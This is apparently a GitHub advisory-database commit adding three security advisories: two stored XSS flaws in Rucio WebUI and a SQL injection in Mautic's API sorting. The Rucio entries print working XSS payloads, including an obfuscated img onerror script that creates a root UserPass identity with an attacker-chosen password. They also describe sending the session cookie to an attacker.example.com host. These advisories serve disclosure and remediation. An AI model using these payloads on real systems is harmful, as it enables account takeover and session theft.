Skip to content

Commit 4e2cbc6

Browse files
advisory-database[bot]advisory-database[bot]
committed
Publish Advisories
GHSA-8wpv-6x3f-3rm5 GHSA-h9fp-p2p9-873q GHSA-r5j5-q42h-fc93
1 parent 3df5130 commit 4e2cbc6

3 files changed

Lines changed: 335 additions & 0 deletions

File tree

advisories/github-reviewed/2026/02/GHSA-8wpv-6x3f-3rm5/GHSA-8wpv-6x3f-3rm5.json

Lines changed: 112 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,112 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-8wpv-6x3f-3rm5",
4+
"modified": "2026-02-25T19:29:37Z",
5+
"published": "2026-02-25T19:29:37Z",
6+
"aliases": [
7+
"CVE-2026-25735"
8+
],
9+
"summary": " Rucio WebUI has a Stored Cross-site Scripting (XSS) vulnerability its Identity Name",
10+
"details": "### Summary\nA stored Cross-site Scripting (XSS) vulnerability was identified in the Identity Name of the WebUI where attacker-controlled input is persisted by the backend and later rendered in the WebUI without proper output encoding. This allows arbitrary JavaScript execution in the context of the WebUI for users who view affected pages, potentially enabling session token theft or unauthorized actions.\n\n---\n### Details\nThe identity name is stored and later rendered without output encoding.\n\n**Create Path**: \nAdmin > Account Management > _ACCOUNT NAME_ > Add Account Identity\n\n**Trigger Path**: \nAdmin > Account Management > _ACCOUNT NAME_ \n(`https://127.0.0.1:8443/ui/account?account=pentest`)\n\n**Request**\n```http\nPOST /proxy/accounts/pentest/identities HTTP/1.1\n...\n{\"identity\":\"<script>alert(document.cookie)</script>\",\"authtype\":\"SSH\",\"email\":\"Test\"}\n```\n\n**Response**\n```http\nHTTP/1.1 201 CREATED\n...\nCreated\n```\n\n**Storing XSS payload in account identity name**\n<img width=\"1385\" height=\"807\" alt=\"Storing XSS payload in account identity name\" src=\"https://github.com/user-attachments/assets/e4209ef4-fd88-492f-9fb0-afb7d04b15ce\" />\n\n**Triggering XSS payload when viewing account**\n<img width=\"1395\" height=\"745\" alt=\"Triggering XSS payload when viewing account\" src=\"https://github.com/user-attachments/assets/e6217669-a0f7-4aba-bb05-f4fb7049611c\" />\n\n---\n### Impact\nAny authenticated user who views affected resources may execute attacker-controlled JavaScript in the WebUI origin. Depending on the affected feature, this may impact all users or administrative users only.\n\nThe impact is amplified by:\n- Session cookies that are accessible to JavaScript (missing HttpOnly flag).\n- API tokens exposed to the WebUI via JavaScript variables.\n\nAn attacker would likely attempt to exfiltrate the session token to an external site by setting an encoded version of the cookie as the path of a GET request to an attacker controlled site (i.e `GET https://attacker.example.com/rucio/{BASE64_COOKIE}`).\n\nAttackers can also perform actions as the victim like creating a new UserPass identity with an attacker known password, creating/deleting an RSE, or exfiltrating data.\n\n**XSS Payload to Create Root UserPass**\n```html\n<img src=x onerror=(function(){o={};o.method='PUT';o.credentials='include';o.headers={'X-Rucio-Username':'attackeruser','X-Rucio-Password':'AttackerPassword123','X-Rucio-Email':'demo@example.org','X-Rucio-Auth-Token':token};fetch(String.fromCharCode(47)+'identities'+String.fromCharCode(47)+'root'+String.fromCharCode(47)+'userpass',o)})()>\n```\n\n---\n### Remediation / Mitigation\nAll client-side renderings of server-provided or user-controlled data must ensure proper HTML escaping before insertion into the DOM. Unsafe methods such as `.html()` should be avoided unless the content is explicitly sanitized. Safer alternatives include `.text()`, creating text nodes, or using a templating system that enforces automatic escaping.\n\nAdditional defense-in-depth measures include:\n- Enforcing a strict Content Security Policy (CSP).\n- Setting the HttpOnly flag on session cookies.\n- Avoiding exposure of API tokens in JavaScript-accessible variables.\n\n> Note that many pages were found setting the API token as `token` in an authenticated response like `var token = \"root-root-webui-...:\"` (See `/ui/list_accounts` for example)\n\n---\n### References\n- OWASP XSS Prevention Cheat Sheet: [https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "PyPI",
21+
"name": "rucio-webui"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "35.8.3"
32+
}
33+
]
34+
}
35+
]
36+
},
37+
{
38+
"package": {
39+
"ecosystem": "PyPI",
40+
"name": "rucio-webui"
41+
},
42+
"ranges": [
43+
{
44+
"type": "ECOSYSTEM",
45+
"events": [
46+
{
47+
"introduced": "36.0.0rc1"
48+
},
49+
{
50+
"fixed": "38.5.4"
51+
}
52+
]
53+
}
54+
]
55+
},
56+
{
57+
"package": {
58+
"ecosystem": "PyPI",
59+
"name": "rucio-webui"
60+
},
61+
"ranges": [
62+
{
63+
"type": "ECOSYSTEM",
64+
"events": [
65+
{
66+
"introduced": "39.0.0rc1"
67+
},
68+
{
69+
"fixed": "39.3.1"
70+
}
71+
]
72+
}
73+
]
74+
}
75+
],
76+
"references": [
77+
{
78+
"type": "WEB",
79+
"url": "https://github.com/rucio/rucio/security/advisories/GHSA-8wpv-6x3f-3rm5"
80+
},
81+
{
82+
"type": "WEB",
83+
"url": "https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html"
84+
},
85+
{
86+
"type": "PACKAGE",
87+
"url": "https://github.com/rucio/rucio"
88+
},
89+
{
90+
"type": "WEB",
91+
"url": "https://github.com/rucio/rucio/releases/tag/35.8.3"
92+
},
93+
{
94+
"type": "WEB",
95+
"url": "https://github.com/rucio/rucio/releases/tag/38.5.4"
96+
},
97+
{
98+
"type": "WEB",
99+
"url": "https://github.com/rucio/rucio/releases/tag/39.3.1"
100+
}
101+
],
102+
"database_specific": {
103+
"cwe_ids": [
104+
"CWE-1004",
105+
"CWE-79"
106+
],
107+
"severity": "MODERATE",
108+
"github_reviewed": true,
109+
"github_reviewed_at": "2026-02-25T19:29:37Z",
110+
"nvd_published_at": null
111+
}
112+
}

advisories/github-reviewed/2026/02/GHSA-h9fp-p2p9-873q/GHSA-h9fp-p2p9-873q.json

Lines changed: 112 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,112 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-h9fp-p2p9-873q",
4+
"modified": "2026-02-25T19:29:22Z",
5+
"published": "2026-02-25T19:29:22Z",
6+
"aliases": [
7+
"CVE-2026-25734"
8+
],
9+
"summary": " Rucio WebUI has Stored Cross-site Scripting (XSS) in RSE Metadata",
10+
"details": "### Summary\nA stored Cross-site Scripting (XSS) vulnerability was identified in the RSE metadata of the WebUI where attacker-controlled input is persisted by the backend and later rendered in the WebUI without proper output encoding. This allows arbitrary JavaScript execution in the context of the WebUI for users who view affected pages, potentially enabling session token theft or unauthorized actions.\n\n---\n### Details\nSeveral metadata fields accept arbitrary input which is stored and later rendered unsafely in the WebUI when the RSEs are listed in the RSE Management dashboard.\n\n**Create Path**: \nAdmin > RSE Management\n\n**Trigger Paths**: \nAdmin > RSE Management \nAdmin > RSE Management > _RSE NAME_\n\n**Vulnerable Attributes**: \nCity, Country_Name, ISP\n\n**Request**\n```http\nPOST /proxy/rses/XSSTEST HTTP/1.1\n...\n{\"city\":\"<script>alert('CITY XSS')</script>\",\"country_name\":\"<script>alert('COUNTRY XSS')</script>\",\"ISP\":\"<script>alert('ISP XSS')</script>\",\"deterministic\":false,\"volatile\":false,\"staging_area\":false}\n```\n\n**Response**\n```http\nHTTP/1.1 201 CREATED\n...\nCreated\n```\n\n**Stored XSS payload triggering in RSE listing after adding XSS payload in metadata**\n<img width=\"1252\" height=\"624\" alt=\"Stored XSS payload triggering in RSE listing after adding XSS payload in metadata\" src=\"https://github.com/user-attachments/assets/6546fc95-0c81-4db7-9271-37b5d4bc8f47\" />\n\n---\n### Impact\nAny authenticated user who views affected resources may execute attacker-controlled JavaScript in the WebUI origin. Depending on the affected feature, this may impact all users or administrative users only.\n\nThe impact is amplified by:\n- Session cookies that are accessible to JavaScript (missing HttpOnly flag).\n- API tokens exposed to the WebUI via JavaScript variables.\n\nAn attacker would likely attempt to exfiltrate the session token to an external site by setting an encoded version of the cookie as the path of a GET request to an attacker controlled site (i.e `GET https://attacker.example.com/rucio/{BASE64_COOKIE}`).\n\nAttackers can also perform actions as the victim like creating a new UserPass identity with an attacker known password, creating/deleting an RSE, or exfiltrating data.\n\n**XSS Payload to Create Root UserPass**\n```html\n<img src=x onerror=(function(){o={};o.method='PUT';o.credentials='include';o.headers={'X-Rucio-Username':'attackeruser','X-Rucio-Password':'AttackerPassword123','X-Rucio-Email':'demo@example.org','X-Rucio-Auth-Token':token};fetch(String.fromCharCode(47)+'identities'+String.fromCharCode(47)+'root'+String.fromCharCode(47)+'userpass',o)})()>\n```\n\n---\n### Remediation / Mitigation\nAll client-side renderings of server-provided or user-controlled data must ensure proper HTML escaping before insertion into the DOM. Unsafe methods such as `.html()` should be avoided unless the content is explicitly sanitized. Safer alternatives include `.text()`, creating text nodes, or using a templating system that enforces automatic escaping.\n\nAdditional defense-in-depth measures include:\n- Enforcing a strict Content Security Policy (CSP).\n- Setting the HttpOnly flag on session cookies.\n- Avoiding exposure of API tokens in JavaScript-accessible variables.\n\n> Note that many pages were found setting the API token as `token` in an authenticated response like `var token = \"root-root-webui-...:\"` (See `/ui/list_accounts` for example)\n\n---\n### Resources\n- OWASP XSS Prevention Cheat Sheet: [https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "PyPI",
21+
"name": "rucio-webui"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "35.8.3"
32+
}
33+
]
34+
}
35+
]
36+
},
37+
{
38+
"package": {
39+
"ecosystem": "PyPI",
40+
"name": "rucio-webui"
41+
},
42+
"ranges": [
43+
{
44+
"type": "ECOSYSTEM",
45+
"events": [
46+
{
47+
"introduced": "36.0.0rc1"
48+
},
49+
{
50+
"fixed": "38.5.4"
51+
}
52+
]
53+
}
54+
]
55+
},
56+
{
57+
"package": {
58+
"ecosystem": "PyPI",
59+
"name": "rucio-webui"
60+
},
61+
"ranges": [
62+
{
63+
"type": "ECOSYSTEM",
64+
"events": [
65+
{
66+
"introduced": "39.0.0rc1"
67+
},
68+
{
69+
"fixed": "39.3.1"
70+
}
71+
]
72+
}
73+
]
74+
}
75+
],
76+
"references": [
77+
{
78+
"type": "WEB",
79+
"url": "https://github.com/rucio/rucio/security/advisories/GHSA-h9fp-p2p9-873q"
80+
},
81+
{
82+
"type": "WEB",
83+
"url": "https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html"
84+
},
85+
{
86+
"type": "PACKAGE",
87+
"url": "https://github.com/rucio/rucio"
88+
},
89+
{
90+
"type": "WEB",
91+
"url": "https://github.com/rucio/rucio/releases/tag/35.8.3"
92+
},
93+
{
94+
"type": "WEB",
95+
"url": "https://github.com/rucio/rucio/releases/tag/38.5.4"
96+
},
97+
{
98+
"type": "WEB",
99+
"url": "https://github.com/rucio/rucio/releases/tag/39.3.1"
100+
}
101+
],
102+
"database_specific": {
103+
"cwe_ids": [
104+
"CWE-1004",
105+
"CWE-79"
106+
],
107+
"severity": "MODERATE",
108+
"github_reviewed": true,
109+
"github_reviewed_at": "2026-02-25T19:29:22Z",
110+
"nvd_published_at": null
111+
}
112+
}

advisories/github-reviewed/2026/02/GHSA-r5j5-q42h-fc93/GHSA-r5j5-q42h-fc93.json

Lines changed: 111 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,111 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-r5j5-q42h-fc93",
4+
"modified": "2026-02-25T19:28:39Z",
5+
"published": "2026-02-25T19:28:39Z",
6+
"aliases": [
7+
"CVE-2026-3105"
8+
],
9+
"summary": "Mautic is Vulnerable to SQL Injection through Contact Activity API Sorting",
10+
"details": "### Summary\nThis advisory addresses a SQL Injection vulnerability in the API endpoint used for retrieving contact activities. A vulnerability exists in the query construction for the Contact Activity timeline where the parameter responsible for determining the sort direction was not strictly validated against an allowlist, potentially allowing authenticated users to inject arbitrary SQL commands via the API.\n\n### Mitigation\n\nPlease update to **5.2.10**, **6.0.8**, **7.0.1** or later.\n\n### Workarounds\n\nNone.\n\n### References\n\nIf there are any questions or comments about this advisory:\n\nEmail Mautic at [security@mautic.org](mailto:security@mautic.org)",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "Packagist",
21+
"name": "mautic/core"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "2.10.0"
29+
},
30+
{
31+
"fixed": "5.2.10"
32+
}
33+
]
34+
}
35+
]
36+
},
37+
{
38+
"package": {
39+
"ecosystem": "Packagist",
40+
"name": "mautic/core"
41+
},
42+
"ranges": [
43+
{
44+
"type": "ECOSYSTEM",
45+
"events": [
46+
{
47+
"introduced": "6.0.0-alpha"
48+
},
49+
{
50+
"fixed": "6.0.8"
51+
}
52+
]
53+
}
54+
]
55+
},
56+
{
57+
"package": {
58+
"ecosystem": "Packagist",
59+
"name": "mautic/core"
60+
},
61+
"ranges": [
62+
{
63+
"type": "ECOSYSTEM",
64+
"events": [
65+
{
66+
"introduced": "7.0.0-alpha"
67+
},
68+
{
69+
"fixed": "7.0.1"
70+
}
71+
]
72+
}
73+
]
74+
}
75+
],
76+
"references": [
77+
{
78+
"type": "WEB",
79+
"url": "https://github.com/mautic/mautic/security/advisories/GHSA-r5j5-q42h-fc93"
80+
},
81+
{
82+
"type": "ADVISORY",
83+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3105"
84+
},
85+
{
86+
"type": "PACKAGE",
87+
"url": "https://github.com/mautic/mautic"
88+
},
89+
{
90+
"type": "WEB",
91+
"url": "https://github.com/mautic/mautic/releases/tag/5.2.10"
92+
},
93+
{
94+
"type": "WEB",
95+
"url": "https://github.com/mautic/mautic/releases/tag/6.0.8"
96+
},
97+
{
98+
"type": "WEB",
99+
"url": "https://github.com/mautic/mautic/releases/tag/7.0.1"
100+
}
101+
],
102+
"database_specific": {
103+
"cwe_ids": [
104+
"CWE-89"
105+
],
106+
"severity": "HIGH",
107+
"github_reviewed": true,
108+
"github_reviewed_at": "2026-02-25T19:28:39Z",
109+
"nvd_published_at": "2026-02-24T20:27:50Z"
110+
}
111+
}

0 commit comments

Comments
 (0)